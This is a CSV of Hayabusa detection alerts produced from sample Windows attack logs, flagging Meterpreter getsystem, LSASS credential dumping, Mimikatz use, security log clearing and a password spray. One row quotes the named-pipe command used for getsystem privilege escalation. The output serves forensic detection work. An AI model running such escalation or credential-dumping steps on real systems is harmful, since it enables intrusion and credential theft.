2019-04-30 16:46:15.215 +09:00,IEWIN7,1,informational,Process Creation,Command: cmd.exe /c echo msdhch > \\.\pipe\msdhch : Path: C:\Windows\System32\cmd.exe : User: NT AUTHORITY\SYSTEM : Parent Command: C:\Windows\system32\services.exe,rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/sysmon_13_1_meterpreter_getsystem_NamedPipeImpersonation.evtx
2019-04-30 16:46:15.215 +09:00,IEWIN7,1,high,Abused Debug Privilege by Arbitrary Parent Processes,,rules/sigma/process_creation/sysmon_abusing_debug_privilege.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/sysmon_13_1_meterpreter_getsystem_NamedPipeImpersonation.evtx
2019-04-30 16:46:15.215 +09:00,IEWIN7,1,high,Meterpreter or Cobalt Strike Getsystem Service Start,,rules/sigma/process_creation/win_meterpreter_or_cobaltstrike_getsystem_service_start.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/sysmon_13_1_meterpreter_getsystem_NamedPipeImpersonation.evtx
2019-04-30 21:43:43.784 +09:00,IEWIN7,8,high,Password Dumper Remote Thread in LSASS,,rules/sigma/create_remote_thread/sysmon_password_dumper_lsass.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Credential Access/CA_sysmon_hashdump_cmd_meterpreter.evtx
2019-04-30 21:43:43.784 +09:00,IEWIN7,8,high,Password Dumper Remote Thread in LSASS,,rules/sigma/create_remote_thread/sysmon_password_dumper_lsass.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Credential Access/CA_sysmon_hashdump_cmd_meterpreter.evtx
2019-04-30 21:43:43.784 +09:00,IEWIN7,10,high,Credentials Dumping Tools Accessing LSASS Memory,,rules/sigma/process_access/sysmon_cred_dump_lsass_access.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Credential Access/CA_sysmon_hashdump_cmd_meterpreter.evtx
2019-04-30 21:43:43.784 +09:00,IEWIN7,10,medium,Suspicious In-Memory Module Execution,,rules/sigma/process_access/sysmon_in_memory_assembly_execution.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Credential Access/CA_sysmon_hashdump_cmd_meterpreter.evtx
2019-04-30 21:43:43.784 +09:00,IEWIN7,10,medium,Suspicious In-Memory Module Execution,,rules/sigma/process_access/sysmon_in_memory_assembly_execution.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Credential Access/CA_sysmon_hashdump_cmd_meterpreter.evtx
2019-04-30 21:43:43.784 +09:00,IEWIN7,10,medium,Suspicious In-Memory Module Execution,,rules/sigma/process_access/sysmon_in_memory_assembly_execution.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Credential Access/CA_sysmon_hashdump_cmd_meterpreter.evtx
2019-04-30 21:43:43.784 +09:00,IEWIN7,10,medium,Suspicious In-Memory Module Execution,,rules/sigma/process_access/sysmon_in_memory_assembly_execution.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Credential Access/CA_sysmon_hashdump_cmd_meterpreter.evtx
2019-04-30 21:43:43.784 +09:00,IEWIN7,10,medium,Suspicious In-Memory Module Execution,,rules/sigma/process_access/sysmon_in_memory_assembly_execution.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Credential Access/CA_sysmon_hashdump_cmd_meterpreter.evtx
2019-04-30 21:43:43.784 +09:00,IEWIN7,10,medium,Suspicious In-Memory Module Execution,,rules/sigma/process_access/sysmon_in_memory_assembly_execution.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Credential Access/CA_sysmon_hashdump_cmd_meterpreter.evtx
2019-04-30 21:43:43.784 +09:00,IEWIN7,10,medium,Suspicious In-Memory Module Execution,,rules/sigma/process_access/sysmon_in_memory_assembly_execution.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Credential Access/CA_sysmon_hashdump_cmd_meterpreter.evtx
2019-05-01 03:08:22.618 +09:00,Sec504Student,1102,high,Security log was cleared,User: Sec504,rules/hayabusa/default/alerts/Security/1102_IndicatorRemovalOnHost-ClearWindowsEventLogs_SecurityLogCleared.yml,../hayabusa-sample-evtx/DeepBlueCLI/mimikatz-privesc-hashdump.evtx
2019-05-01 03:08:29.138 +09:00,Sec504Student,4673,medium,Unknown process used a high privilege,Process: C:\Tools\mimikatz\mimikatz.exe : User: Sec504 : LogonID: 0x1e3dd,rules/hayabusa/default/alerts/Security/4673_Multiple_UnknownProcessUsedHighPrivilege.yml,../hayabusa-sample-evtx/DeepBlueCLI/mimikatz-privesc-hashdump.evtx
2019-05-01 03:08:29.138 +09:00,Sec504Student,4673,critical,Mimikatz Use,,rules/sigma/builtin/win_alert_mimikatz_keywords.yml,../hayabusa-sample-evtx/DeepBlueCLI/mimikatz-privesc-hashdump.evtx
2019-05-01 03:08:29.138 +09:00,Sec504Student,4673,high,Relevant Anti-Virus Event,,rules/sigma/builtin/application/win_av_relevant_match.yml,../hayabusa-sample-evtx/DeepBlueCLI/mimikatz-privesc-hashdump.evtx
2019-05-01 03:08:29.138 +09:00,Sec504Student,4673,medium,Unknown process used a high privilege,Process: C:\Tools\mimikatz\mimikatz.exe : User: Sec504 : LogonID: 0x1e3dd,rules/hayabusa/default/alerts/Security/4673_Multiple_UnknownProcessUsedHighPrivilege.yml,../hayabusa-sample-evtx/DeepBlueCLI/mimikatz-privesc-hashdump.evtx
2019-05-01 03:08:29.138 +09:00,Sec504Student,4673,critical,Mimikatz Use,,rules/sigma/builtin/win_alert_mimikatz_keywords.yml,../hayabusa-sample-evtx/DeepBlueCLI/mimikatz-privesc-hashdump.evtx
2019-05-01 03:08:29.138 +09:00,Sec504Student,4673,high,Relevant Anti-Virus Event,,rules/sigma/builtin/application/win_av_relevant_match.yml,../hayabusa-sample-evtx/DeepBlueCLI/mimikatz-privesc-hashdump.evtx
2019-05-01 03:08:29.138 +09:00,Sec504Student,4673,medium,Unknown process used a high privilege,Process: C:\Tools\mimikatz\mimikatz.exe : User: Sec504 : LogonID: 0x1e3dd,rules/hayabusa/default/alerts/Security/4673_Multiple_UnknownProcessUsedHighPrivilege.yml,../hayabusa-sample-evtx/DeepBlueCLI/mimikatz-privesc-hashdump.evtx
2019-05-01 03:08:29.138 +09:00,Sec504Student,4673,critical,Mimikatz Use,,rules/sigma/builtin/win_alert_mimikatz_keywords.yml,../hayabusa-sample-evtx/DeepBlueCLI/mimikatz-privesc-hashdump.evtx
2019-05-01 03:08:29.138 +09:00,Sec504Student,4673,high,Relevant Anti-Virus Event,,rules/sigma/builtin/application/win_av_relevant_match.yml,../hayabusa-sample-evtx/DeepBlueCLI/mimikatz-privesc-hashdump.evtx
2019-05-01 03:08:29.138 +09:00,Sec504Student,4673,medium,Unknown process used a high privilege,Process: C:\Tools\mimikatz\mimikatz.exe : User: Sec504 : LogonID: 0x1e3dd,rules/hayabusa/default/alerts/Security/4673_Multiple_UnknownProcessUsedHighPrivilege.yml,../hayabusa-sample-evtx/DeepBlueCLI/mimikatz-privesc-hashdump.evtx
2019-05-01 03:08:29.138 +09:00,Sec504Student,4673,critical,Mimikatz Use,,rules/sigma/builtin/win_alert_mimikatz_keywords.yml,../hayabusa-sample-evtx/DeepBlueCLI/mimikatz-privesc-hashdump.evtx
2019-05-01 03:08:29.138 +09:00,Sec504Student,4673,high,Relevant Anti-Virus Event,,rules/sigma/builtin/application/win_av_relevant_match.yml,../hayabusa-sample-evtx/DeepBlueCLI/mimikatz-privesc-hashdump.evtx
2019-05-01 04:27:00.297 +09:00,DESKTOP-JR78RLP,1102,high,Security log was cleared,User: jwrig,rules/hayabusa/default/alerts/Security/1102_IndicatorRemovalOnHost-ClearWindowsEventLogs_SecurityLogCleared.yml,../hayabusa-sample-evtx/DeepBlueCLI/password-spray.evtx
2019-05-01 04:27:02.847 +09:00,DESKTOP-JR78RLP,4648,informational,Explicit Logon,Source User: jwrig : Target User: Administrator : IP Address: 172.16.144.128 : Process: : Target Server: DESKTOP-JR78RLP,rules/hayabusa/default/events/Security/Logons/4648_ExplicitLogon.yml,../hayabusa-sample-evtx/DeepBlueCLI/password-spray.evtx
2019-05-01 04:27:02.847 +09:00,-,-,medium,Password Spray,[condition] count(TargetUserName) by IpAddress >= 5 in timeframe [result] count:41 TargetUserName:cspizor/bgreenwood/baker/dpendolino/melliott/cfleener/sarmstrong/sanson/lpesce/wstrzelec/drook/thessman/mtoussain/jorchilles/ssims/bhostetler/dmashburn/edygert/cmoody/tbennett/cdavis/zmathis/eskoudis/jleytevidal/jwright/bgalbraith/psmith/lschifano/celgee/kperryman/bking/cragoso/rbowes/jkulikowski/jlake/econrad/smisenar/mdouglas/gsalinas/Administrator/ebooth IpAddress:172.16.144.128 timeframe:5m,rules/hayabusa/default/alerts/Security/4648_BruteForce_PasswordSprayDetect.yml,-
2019-05-01 04:27:03.925 +09:00,DESKTOP-JR78RLP,4648,informational,Explicit Logon,Source User: jwrig : Target User: jwright : IP Address: 172.16.144.128 : Process: : Target Server: DESKTOP-JR78RLP,rules/hayabusa/default/events/Security/Logons/4648_ExplicitLogon.yml,../hayabusa-sample-evtx/DeepBlueCLI/password-spray.evtx
2019-05-01 04:27:05.020 +09:00,DESKTOP-JR78RLP,4648,informational,Explicit Logon,Source User: jwrig : Target User: dpendolino : IP Address: 172.16.144.128 : Process: : Target Server: DESKTOP-JR78RLP,rules/hayabusa/default/events/Security/Logons/4648_ExplicitLogon.yml,../hayabusa-sample-evtx/DeepBlueCLI/password-spray.evtx
2019-05-01 04:27:06.085 +09:00,DESKTOP-JR78RLP,4648,informational,Explicit Logon,Source User: jwrig : Target User: celgee : IP Address: 172.16.144.128 : Process: : Target Server: DESKTOP-JR78RLP,rules/hayabusa/default/events/Security/Logons/4648_ExplicitLogon.yml,../hayabusa-sample-evtx/DeepBlueCLI/password-spray.evtx
2019-05-01 04:27:07.171 +09:00,DESKTOP-JR78RLP,4648,informational,Explicit Logon,Source User: jwrig : Target User: thessman : IP Address: 172.16.144.128 : Process: : Target Server: DESKTOP-JR78RLP,rules/hayabusa/default/events/Security/Logons/4648_ExplicitLogon.yml,../hayabusa-sample-evtx/DeepBlueCLI/password-spray.evtx
2019-05-01 04:27:08.254 +09:00,DESKTOP-JR78RLP,4648,informational,Explicit Logon,Source User: jwrig : Target User: eskoudis : IP Address: 172.16.144.128 : Process: : Target Server: DESKTOP-JR78RLP,rules/hayabusa/default/events/Security/Logons/4648_ExplicitLogon.yml,../hayabusa-sample-evtx/DeepBlueCLI/password-spray.evtx
2019-05-01 04:27:09.323 +09:00,DESKTOP-JR78RLP,4648,informational,Explicit Logon,Source User: jwrig : Target User: cdavis : IP Address: 172.16.144.128 : Process: : Target Server: DESKTOP-JR78RLP,rules/hayabusa/default/events/Security/Logons/4648_ExplicitLogon.yml,../hayabusa-sample-evtx/DeepBlueCLI/password-spray.evtx
2019-05-01 04:27:10.377 +09:00,DESKTOP-JR78RLP,4648,informational,Explicit Logon,Source User: jwrig : Target User: mtoussain : IP Address: 172.16.144.128 : Process: : Target Server: DESKTOP-JR78RLP,rules/hayabusa/default/events/Security/Logons/4648_ExplicitLogon.yml,../hayabusa-sample-evtx/DeepBlueCLI/password-spray.evtx
2019-05-01 04:27:11.465 +09:00,DESKTOP-JR78RLP,4648,informational,Explicit Logon,Source User: jwrig : Target User: lschifano : IP Address: 172.16.144.128 : Process: : Target Server: DESKTOP-JR78RLP,rules/hayabusa/default/events/Security/Logons/4648_ExplicitLogon.yml,../hayabusa-sample-evtx/DeepBlueCLI/password-spray.evtx
2019-05-01 04:27:12.549 +09:00,DESKTOP-JR78RLP,4648,informational,Explicit Logon,Source User: jwrig : Target User: bhostetler : IP Address: 172.16.144.128 : Process: : Target Server: DESKTOP-JR78RLP,rules/hayabusa/default/events/Security/Logons/4648_ExplicitLogon.yml,../hayabusa-sample-evtx/DeepBlueCLI/password-spray.evtx
2019-05-01 04:27:13.611 +09:00,DESKTOP-JR78RLP,4648,informational,Explicit Logon,Source User: jwrig : Target User: rbowes : IP Address: 172.16.144.128 : Process: : Target Server: DESKTOP-JR78RLP,rules/hayabusa/default/events/Security/Logons/4648_ExplicitLogon.yml,../hayabusa-sample-evtx/DeepBlueCLI/password-spray.evtx
2019-05-01 04:27:14.687 +09:00,DESKTOP-JR78RLP,4648,informational,Explicit Logon,Source User: jwrig : Target User: ebooth : IP Address: 172.16.144.128 : Process: : Target Server: DESKTOP-JR78RLP,rules/hayabusa/default/events/Security/Logons/4648_ExplicitLogon.yml,../hayabusa-sample-evtx/DeepBlueCLI/password-spray.evtx
2019-05-01 04:27:15.750 +09:00,DESKTOP-JR78RLP,4648,informational,Explicit Logon,Source User: jwrig : Target User: cfleener : IP Address: 172.16.144.128 : Process: : Target Server: DESKTOP-JR78RLP,rules/hayabusa/default/events/Security/Logons/4648_ExplicitLogon.yml,../hayabusa-sample-evtx/DeepBlueCLI/password-spray.evtx
2019-05-01 04:27:16.841 +09:00,DESKTOP-JR78RLP,4648,informational,Explicit Logon,Source User: jwrig : Target User: cmoody : IP Address: 172.16.144.128 : Process: : Target Server: DESKTOP-JR78RLP,rules/hayabusa/default/events/Security/Logons/4648_ExplicitLogon.yml,../hayabusa-sample-evtx/DeepBlueCLI/password-spray.evtx
2019-05-01 04:27:17.922 +09:00,DESKTOP-JR78RLP,4648,informational,Explicit Logon,Source User: jwrig : Target User: psmith : IP Address: 172.16.144.128 : Process: : Target Server: DESKTOP-JR78RLP,rules/hayabusa/default/events/Security/Logons/4648_ExplicitLogon.yml,../hayabusa-sample-evtx/DeepBlueCLI/password-spray.evtx
2019-05-01 04:27:19.035 +09:00,DESKTOP-JR78RLP,4648,informational,Explicit Logon,Source User: jwrig : Target User: jkulikowski : IP Address: 172.16.144.128 : Process: : Target Server: DESKTOP-JR78RLP,rules/hayabusa/default/events/Security/Logons/4648_ExplicitLogon.yml,../hayabusa-sample-evtx/DeepBlueCLI/password-spray.evtx
2019-05-01 04:27:20.097 +09:00,DESKTOP-JR78RLP,4648,informational,Explicit Logon,Source User: jwrig : Target User: gsalinas : IP Address: 172.16.144.128 : Process: : Target Server: DESKTOP-JR78RLP,rules/hayabusa/default/events/Security/Logons/4648_ExplicitLogon.yml,../hayabusa-sample-evtx/DeepBlueCLI/password-spray.evtx
2019-05-01 04:27:21.156 +09:00,DESKTOP-JR78RLP,4648,informational,Explicit Logon,Source User: jwrig : Target User: tbennett : IP Address: 172.16.144.128 : Process: : Target Server: DESKTOP-JR78RLP,rules/hayabusa/default/events/Security/Logons/4648_ExplicitLogon.yml,../hayabusa-sample-evtx/DeepBlueCLI/password-spray.evtx
2019-05-01 04:27:22.222 +09:00,DESKTOP-JR78RLP,4648,informational,Explicit Logon,Source User: jwrig : Target User: econrad : IP Address: 172.16.144.128 : Process: : Target Server: DESKTOP-JR78RLP,rules/hayabusa/default/events/Security/Logons/4648_ExplicitLogon.yml,../hayabusa-sample-evtx/DeepBlueCLI/password-spray.evtx
2019-05-01 04:27:23.295 +09:00,DESKTOP-JR78RLP,4648,informational,Explicit Logon,Source User: jwrig : Target User: smisenar : IP Address: 172.16.144.128 : Process: : Target Server: DESKTOP-JR78RLP,rules/hayabusa/default/events/Security/Logons/4648_ExplicitLogon.yml,../hayabusa-sample-evtx/DeepBlueCLI/password-spray.evtx
2019-05-01 04:27:24.342 +09:00,DESKTOP-JR78RLP,4648,informational,Explicit Logon,Source User: jwrig : Target User: jleytevidal : IP Address: 172.16.144.128 : Process: : Target Server: DESKTOP-JR78RLP,rules/hayabusa/default/events/Security/Logons/4648_ExplicitLogon.yml,../hayabusa-sample-evtx/DeepBlueCLI/password-spray.evtx
2019-05-01 04:27:25.404 +09:00,DESKTOP-JR78RLP,4648,informational,Explicit Logon,Source User: jwrig : Target User: lpesce : IP Address: 172.16.144.128 : Process: : Target Server: DESKTOP-JR78RLP,rules/hayabusa/default/events/Security/Logons/4648_ExplicitLogon.yml,../hayabusa-sample-evtx/DeepBlueCLI/password-spray.evtx
2019-05-01 04:27:26.504 +09:00,DESKTOP-JR78RLP,4648,informational,Explicit Logon,Source User: jwrig : Target User: sanson : IP Address: 172.16.144.128 : Process: : Target Server: DESKTOP-JR78RLP,rules/hayabusa/default/events/Security/Logons/4648_ExplicitLogon.yml,../hayabusa-sample-evtx/DeepBlueCLI/password-spray.evtx
2019-05-01 04:27:27.583 +09:00,DESKTOP-JR78RLP,4648,informational,Explicit Logon,Source User: jwrig : Target User: sarmstrong : IP Address: 172.16.144.128 : Process: : Target Server: DESKTOP-JR78RLP,rules/hayabusa/default/events/Security/Logons/4648_ExplicitLogon.yml,../hayabusa-sample-evtx/DeepBlueCLI/password-spray.evtx
2019-05-01 04:27:28.654 +09:00,DESKTOP-JR78RLP,4648,informational,Explicit Logon,Source User: jwrig : Target User: wstrzelec : IP Address: 172.16.144.128 : Process: : Target Server: DESKTOP-JR78RLP,rules/hayabusa/default/events/Security/Logons/4648_ExplicitLogon.yml,../hayabusa-sample-evtx/DeepBlueCLI/password-spray.evtx
2019-05-01 04:27:29.712 +09:00,DESKTOP-JR78RLP,4648,informational,Explicit Logon,Source User: jwrig : Target User: zmathis : IP Address: 172.16.144.128 : Process: : Target Server: DESKTOP-JR78RLP,rules/hayabusa/default/events/Security/Logons/4648_ExplicitLogon.yml,../hayabusa-sample-evtx/DeepBlueCLI/password-spray.evtx
2019-05-01 04:27:30.787 +09:00,DESKTOP-JR78RLP,4648,informational,Explicit Logon,Source User: jwrig : Target User: melliott : IP Address: 172.16.144.128 : Process: : Target Server: DESKTOP-JR78RLP,rules/hayabusa/default/events/Security/Logons/4648_ExplicitLogon.yml,../hayabusa-sample-evtx/DeepBlueCLI/password-spray.evtx
2019-05-01 04:27:31.861 +09:00,DESKTOP-JR78RLP,4648,informational,Explicit Logon,Source User: jwrig : Target User: kperryman : IP Address: 172.16.144.128 : Process: : Target Server: DESKTOP-JR78RLP,rules/hayabusa/default/events/Security/Logons/4648_ExplicitLogon.yml,../hayabusa-sample-evtx/DeepBlueCLI/password-spray.evtx
2019-05-01 04:27:32.955 +09:00,DESKTOP-JR78RLP,4648,informational,Explicit Logon,Source User: jwrig : Target User: jorchilles : IP Address: 172.16.144.128 : Process: : Target Server: DESKTOP-JR78RLP,rules/hayabusa/default/events/Security/Logons/4648_ExplicitLogon.yml,../hayabusa-sample-evtx/DeepBlueCLI/password-spray.evtx
2019-05-01 04:27:34.020 +09:00,DESKTOP-JR78RLP,4648,informational,Explicit Logon,Source User: jwrig : Target User: jlake : IP Address: 172.16.144.128 : Process: : Target Server: DESKTOP-JR78RLP,rules/hayabusa/default/events/Security/Logons/4648_ExplicitLogon.yml,../hayabusa-sample-evtx/DeepBlueCLI/password-spray.evtx
2019-05-01 04:27:35.081 +09:00,DESKTOP-JR78RLP,4648,informational,Explicit Logon,Source User: jwrig : Target User: edygert : IP Address: 172.16.144.128 : Process: : Target Server: DESKTOP-JR78RLP,rules/hayabusa/default/events/Security/Logons/4648_ExplicitLogon.yml,../hayabusa-sample-evtx/DeepBlueCLI/password-spray.evtx
2019-05-01 04:27:36.151 +09:00,DESKTOP-JR78RLP,4648,informational,Explicit Logon,Source User: jwrig : Target User: drook : IP Address: 172.16.144.128 : Process: : Target Server: DESKTOP-JR78RLP,rules/hayabusa/default/events/Security/Logons/4648_ExplicitLogon.yml,../hayabusa-sample-evtx/DeepBlueCLI/password-spray.evtx
2019-05-01 04:27:37.238 +09:00,DESKTOP-JR78RLP,4648,informational,Explicit Logon,Source User: jwrig : Target User: dmashburn : IP Address: 172.16.144.128 : Process: : Target Server: DESKTOP-JR78RLP,rules/hayabusa/default/events/Security/Logons/4648_ExplicitLogon.yml,../hayabusa-sample-evtx/DeepBlueCLI/password-spray.evtx
2019-05-01 04:27:38.310 +09:00,DESKTOP-JR78RLP,4648,informational,Explicit Logon,Source User: jwrig : Target User: cspizor : IP Address: 172.16.144.128 : Process: : Target Server: DESKTOP-JR78RLP,rules/hayabusa/default/events/Security/Logons/4648_ExplicitLogon.yml,../hayabusa-sample-evtx/DeepBlueCLI/password-spray.evtx
2019-05-01 04:27:39.393 +09:00,DESKTOP-JR78RLP,4648,informational,Explicit Logon,Source User: jwrig : Target User: cragoso : IP Address: 172.16.144.128 : Process: : Target Server: DESKTOP-JR78RLP,rules/hayabusa/default/events/Security/Logons/4648_ExplicitLogon.yml,../hayabusa-sample-evtx/DeepBlueCLI/password-spray.evtx
2019-05-01 04:27:40.457 +09:00,DESKTOP-JR78RLP,4648,informational,Explicit Logon,Source User: jwrig : Target User: bgalbraith : IP Address: 172.16.144.128 : Process: : Target Server: DESKTOP-JR78RLP,rules/hayabusa/default/events/Security/Logons/4648_ExplicitLogon.yml,../hayabusa-sample-evtx/DeepBlueCLI/password-spray.evtx
2019-05-01 04:27:41.553 +09:00,DESKTOP-JR78RLP,4648,informational,Explicit Logon,Source User: jwrig : Target User: bking : IP Address: 172.16.144.128 : Process: : Target Server: DESKTOP-JR78RLP,rules/hayabusa/default/events/Security/Logons/4648_ExplicitLogon.yml,../hayabusa-sample-evtx/DeepBlueCLI/password-spray.evtx
2019-05-01 04:27:42.613 +09:00,DESKTOP-JR78RLP,4648,informational,Explicit Logon,Source User: jwrig : Target User: mdouglas : IP Address: 172.16.144.128 : Process: : Target Server: DESKTOP-JR78RLP,rules/hayabusa/default/events/Security/Logons/4648_ExplicitLogon.yml,../hayabusa-sample-evtx/DeepBlueCLI/password-spray.evtx
2019-05-01 04:27:43.686 +09:00,DESKTOP-JR78RLP,4648,informational,Explicit Logon,Source User: jwrig : Target User: bgreenwood : IP Address: 172.16.144.128 : Process: : Target Server: DESKTOP-JR78RLP,rules/hayabusa/default/events/Security/Logons/4648_ExplicitLogon.yml,../hayabusa-sample-evtx/DeepBlueCLI/password-spray.evtx
2019-05-01 04:27:44.738 +09:00,DESKTOP-JR78RLP,4648,informational,Explicit Logon,Source User: jwrig : Target User: baker : IP Address: 172.16.144.128 : Process: : Target Server: DESKTOP-JR78RLP,rules/hayabusa/default/events/Security/Logons/4648_ExplicitLogon.yml,../hayabusa-sample-evtx/DeepBlueCLI/password-spray.evtx
2019-05-01 04:27:45.818 +09:00,DESKTOP-JR78RLP,4648,informational,Explicit Logon,Source User: jwrig : Target User: ssims : IP Address: 172.16.144.128 : Process: : Target Server: DESKTOP-JR78RLP,rules/hayabusa/default/events/Security/Logons/4648_ExplicitLogon.yml,../hayabusa-sample-evtx/DeepBlueCLI/password-spray.evtx
2019-05-01 04:27:46.896 +09:00,DESKTOP-JR78RLP,4648,informational,Explicit Logon,Source User: jwrig : Target User: smisenar : IP Address: 172.16.144.128 : Process: : Target Server: DESKTOP-JR78RLP,rules/hayabusa/default/events/Security/Logons/4648_ExplicitLogon.yml,../hayabusa-sample-evtx/DeepBlueCLI/password-spray.evtx
2019-05-01 04:27:47.953 +09:00,DESKTOP-JR78RLP,4648,informational,Explicit Logon,Source User: jwrig : Target User: Administrator : IP Address: 172.16.144.128 : Process: : Target Server: DESKTOP-JR78RLP,rules/hayabusa/default/events/Security/Logons/4648_ExplicitLogon.yml,../hayabusa-sample-evtx/DeepBlueCLI/password-spray.evtx
2019-05-01 04:27:49.019 +09:00,DESKTOP-JR78RLP,4648,informational,Explicit Logon,Source User: jwrig : Target User: jwright : IP Address: 172.16.144.128 : Process: : Target Server: DESKTOP-JR78RLP,rules/hayabusa/default/events/Security/Logons/4648_ExplicitLogon.yml,../hayabusa-sample-evtx/DeepBlueCLI/password-spray.evtx
2019-05-01 04:27:50.082 +09:00,DESKTOP-JR78RLP,4648,informational,Explicit Logon,Source User: jwrig : Target User: dpendolino : IP Address: 172.16.144.128 : Process: : Target Server: DESKTOP-JR78RLP,rules/hayabusa/default/events/Security/Logons/4648_ExplicitLogon.yml,../hayabusa-sample-evtx/DeepBlueCLI/password-spray.evtx
2019-05-01 04:27:51.156 +09:00,DESKTOP-JR78RLP,4648,informational,Explicit Logon,Source User: jwrig : Target User: celgee : IP Address: 172.16.144.128 : Process: : Target Server: DESKTOP-JR78RLP,rules/hayabusa/default/events/Security/Logons/4648_ExplicitLogon.yml,../hayabusa-sample-evtx/DeepBlueCLI/password-spray.evtx
2019-05-01 04:27:52.214 +09:00,DESKTOP-JR78RLP,4648,informational,Explicit Logon,Source User: jwrig : Target User: thessman : IP Address: 172.16.144.128 : Process: : Target Server: DESKTOP-JR78RLP,rules/hayabusa/default/events/Security/Logons/4648_ExplicitLogon.yml,../hayabusa-sample-evtx/DeepBlueCLI/password-spray.evtx
2019-05-01 04:27:53.285 +09:00,DESKTOP-JR78RLP,4648,informational,Explicit Logon,Source User: jwrig : Target User: eskoudis : IP Address: 172.16.144.128 : Process: : Target Server: DESKTOP-JR78RLP,rules/hayabusa/default/events/Security/Logons/4648_ExplicitLogon.yml,../hayabusa-sample-evtx/DeepBlueCLI/password-spray.evtx
2019-05-01 04:27:54.354 +09:00,DESKTOP-JR78RLP,4648,informational,Explicit Logon,Source User: jwrig : Target User: cdavis : IP Address: 172.16.144.128 : Process: : Target Server: DESKTOP-JR78RLP,rules/hayabusa/default/events/Security/Logons/4648_ExplicitLogon.yml,../hayabusa-sample-evtx/DeepBlueCLI/password-spray.evtx
2019-05-01 04:27:55.438 +09:00,DESKTOP-JR78RLP,4648,informational,Explicit Logon,Source User: jwrig : Target User: mtoussain : IP Address: 172.16.144.128 : Process: : Target Server: DESKTOP-JR78RLP,rules/hayabusa/default/events/Security/Logons/4648_ExplicitLogon.yml,../hayabusa-sample-evtx/DeepBlueCLI/password-spray.evtx
2019-05-01 04:27:56.513 +09:00,DESKTOP-JR78RLP,4648,informational,Explicit Logon,Source User: jwrig : Target User: lschifano : IP Address: 172.16.144.128 : Process: : Target Server: DESKTOP-JR78RLP,rules/hayabusa/default/events/Security/Logons/4648_ExplicitLogon.yml,../hayabusa-sample-evtx/DeepBlueCLI/password-spray.evtx
2019-05-01 04:27:57.578 +09:00,DESKTOP-JR78RLP,4648,informational,Explicit Logon,Source User: jwrig : Target User: bhostetler : IP Address: 172.16.144.128 : Process: : Target Server: DESKTOP-JR78RLP,rules/hayabusa/default/events/Security/Logons/4648_ExplicitLogon.yml,../hayabusa-sample-evtx/DeepBlueCLI/password-spray.evtx
2019-05-01 04:27:58.661 +09:00,DESKTOP-JR78RLP,4648,informational,Explicit Logon,Source User: jwrig : Target User: rbowes : IP Address: 172.16.144.128 : Process: : Target Server: DESKTOP-JR78RLP,rules/hayabusa/default/events/Security/Logons/4648_ExplicitLogon.yml,../hayabusa-sample-evtx/DeepBlueCLI/password-spray.evtx
2019-05-01 04:27:59.721 +09:00,DESKTOP-JR78RLP,4648,informational,Explicit Logon,Source User: jwrig : Target User: ebooth : IP Address: 172.16.144.128 : Process: : Target Server: DESKTOP-JR78RLP,rules/hayabusa/default/events/Security/Logons/4648_ExplicitLogon.yml,../hayabusa-sample-evtx/DeepBlueCLI/password-spray.evtx
2019-05-01 04:28:00.795 +09:00,DESKTOP-JR78RLP,4648,informational,Explicit Logon,Source User: jwrig : Target User: cfleener : IP Address: 172.16.144.128 : Process: : Target Server: DESKTOP-JR78RLP,rules/hayabusa/default/events/Security/Logons/4648_ExplicitLogon.yml,../hayabusa-sample-evtx/DeepBlueCLI/password-spray.evtx
2019-05-01 04:28:01.865 +09:00,DESKTOP-JR78RLP,4648,informational,Explicit Logon,Source User: jwrig : Target User: cmoody : IP Address: 172.16.144.128 : Process: : Target Server: DESKTOP-JR78RLP,rules/hayabusa/default/events/Security/Logons/4648_ExplicitLogon.yml,../hayabusa-sample-evtx/DeepBlueCLI/password-spray.evtx
2019-05-01 04:28:02.941 +09:00,DESKTOP-JR78RLP,4648,informational,Explicit Logon,Source User: jwrig : Target User: psmith : IP Address: 172.16.144.128 : Process: : Target Server: DESKTOP-JR78RLP,rules/hayabusa/default/events/Security/Logons/4648_ExplicitLogon.yml,../hayabusa-sample-evtx/DeepBlueCLI/password-spray.evtx
2019-05-01 04:28:04.015 +09:00,DESKTOP-JR78RLP,4648,informational,Explicit Logon,Source User: jwrig : Target User: jkulikowski : IP Address: 172.16.144.128 : Process: : Target Server: DESKTOP-JR78RLP,rules/hayabusa/default/events/Security/Logons/4648_ExplicitLogon.yml,../hayabusa-sample-evtx/DeepBlueCLI/password-spray.evtx
2019-05-01 04:28:05.097 +09:00,DESKTOP-JR78RLP,4648,informational,Explicit Logon,Source User: jwrig : Target User: gsalinas : IP Address: 172.16.144.128 : Process: : Target Server: DESKTOP-JR78RLP,rules/hayabusa/default/events/Security/Logons/4648_ExplicitLogon.yml,../hayabusa-sample-evtx/DeepBlueCLI/password-spray.evtx
2019-05-01 04:28:06.182 +09:00,DESKTOP-JR78RLP,4648,informational,Explicit Logon,Source User: jwrig : Target User: tbennett : IP Address: 172.16.144.128 : Process: : Target Server: DESKTOP-JR78RLP,rules/hayabusa/default/events/Security/Logons/4648_ExplicitLogon.yml,../hayabusa-sample-evtx/DeepBlueCLI/password-spray.evtx
2019-05-01 04:28:07.239 +09:00,DESKTOP-JR78RLP,4648,informational,Explicit Logon,Source User: jwrig : Target User: econrad : IP Address: 172.16.144.128 : Process: : Target Server: DESKTOP-JR78RLP,rules/hayabusa/default/events/Security/Logons/4648_ExplicitLogon.yml,../hayabusa-sample-evtx/DeepBlueCLI/password-spray.evtx
